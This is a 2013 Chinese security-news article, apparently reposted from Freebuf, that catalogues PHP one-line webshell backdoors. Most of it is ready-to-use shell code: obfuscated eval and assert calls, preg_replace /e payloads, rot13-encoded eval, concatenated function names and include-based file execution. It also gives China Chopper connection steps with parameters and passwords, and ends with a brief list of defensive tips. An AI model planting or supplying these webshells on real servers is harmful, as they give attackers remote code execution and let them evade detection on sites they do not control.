您所在的位置:网络安全 > 黑客攻防 > 黑客专区 > 系统攻防 > 后门木马 > 那些强悍的PHP一句话后门(3)

那些强悍的PHP一句话后门(3)

2013-05-10 10:56 oooceo Freebuf 字号:T | T
一键收藏,随时查看,分享好友!

强悍的PHP一句话后门,这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。

AD:

三个变形的一句话PHP木马

第一个

  1. <?php ($_=@$_GET[2]).@$_($_POST[1])?> 

在菜单里写http://site/1.php?2=assert密码是1

第二个

  1. <?php 
  2. $_="";  
  3. $_[+""]='';  
  4. $_="$_"."";  
  5. $_=($_[+""]|"").($_[+""]|"").($_[+""]^"");  
  6. ?> 
  7. <?php ${'_'.$_}['_'](${'_'.$_}['__']);?> 

在菜刀里写http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass。如果你用菜刀的附加数据的话更隐蔽,或者用其它注射工具也可以,因为是post提交的。

第三个

  1. ($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add'); 

str_rot13(‘riny’)即编码后的eval,完全避开了关键字,又不失效果,让人吐血!

最后列几个高级的PHP一句话木马后门:

  1. 1、  
  2. $hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";  
  3. $hh("/[discuz]/e",$_POST['h'],"Access");  
  4. //菜刀一句话  
  5. 2、  
  6. $filename=$_GET['xbid'];  
  7. include ($filename);  
  8. //危险的include函数,直接编译任何文件为php格式运行  
  9. 3、  
  10. $reg="c"."o"."p"."y";  
  11. $reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);  
  12. //重命名任何文件  
  13. 4、  
  14. $gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";  
  15. $gzid("/[discuz]/e",$_POST['h'],"Access");  
  16. //菜刀一句话  
  17. 5、include ($uid);  
  18. //危险的include函数,直接编译任何文件为php格式运行,POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif  
  19. //gif插一句话  
  20. 6、典型一句话  
  21. 程序后门代码  
  22. <?php eval_r($_POST[sb])?> 
  23. 程序代码  
  24. <?php @eval_r($_POST[sb])?> 
  25. //容错代码  
  26. 程序代码  
  27. <?php assert($_POST[sb]);?> 
  28. //使用lanker一句话客户端的专家模式执行相关的php语句  
  29. 程序代码  
  30. <?$_POST['sa']($_POST['sb']);?> 
  31. 程序代码  
  32. <?$_POST['sa']($_POST['sb'],$_POST['sc'])?> 
  33. 程序代码  
  34. <?php 
  35. @preg_replace("/[email]/e",$_POST['h'],"error");  
  36. ?> 
  37. //使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入  
  38. 程序代码  
  39. <O>h=@eval_r($_POST1);</O> 
  40. 程序代码  
  41. <script language="php">@eval_r($_POST[sb])</script> 
  42. //绕过<?限制的一句话 

综上,这些PHP一句话后门可谓五脏俱全,一不小心您肯定中招了,而我们今天这篇文章的重中之重在哪呢?重点就在下边的总结!

如何应对PHP一句话后门:

我们强调几个关键点,看这文章的你相信不是门外汉,我也就不啰嗦了:

1,对PHP程序编写要有安全意识
2,服务器日志文件要经常看,经常备份
3,对每个站点进行严格的权限分配
4,对动态文件及目录经常批量安全审查
5,学会如何进行手工杀毒《即行为判断查杀》
6,时刻关注,或渗入活跃的网络安全营地
7,对服务器环境层级化处理,哪怕一个函数也可做规则

我们认为当管理的站点多了,数据量大时,我们应合理应用一些辅助工具,但不应完全依赖这些工具,技术是时刻在更新进步的,最为重要的是你应学会和理解,编写这些强悍后门的人所处思维,角色上的换位可为你带来更大的进步。

【编辑推荐】

  1. 黑客也玩无间道之后门程序的后门
  2. 经济半小时:警惕网络支付的后门
  3. Darkleech木马升级:可能是最精良的apache后门
【责任编辑:蓝雨泪 TEL:(010)68476606】




分享到:

  1. 企业管理层如何支持首席信息安全官改善网络安全?
  2. 特权账号管理那些事

热点职位

更多>>

热点专题

更多>>

读书

SQL实用简明教程(第2版)
SQL(结构化查询语言)是数据库系统的通用语言,利用它可以用几乎同样的语句在不同的数据库系统上执行同样的操作,在数据库系统的

51CTO旗下网站

领先的IT技术网站 51CTO 中国首个CIO网站 CIOage 中国首家数字医疗网站 HC3i 51CTO学院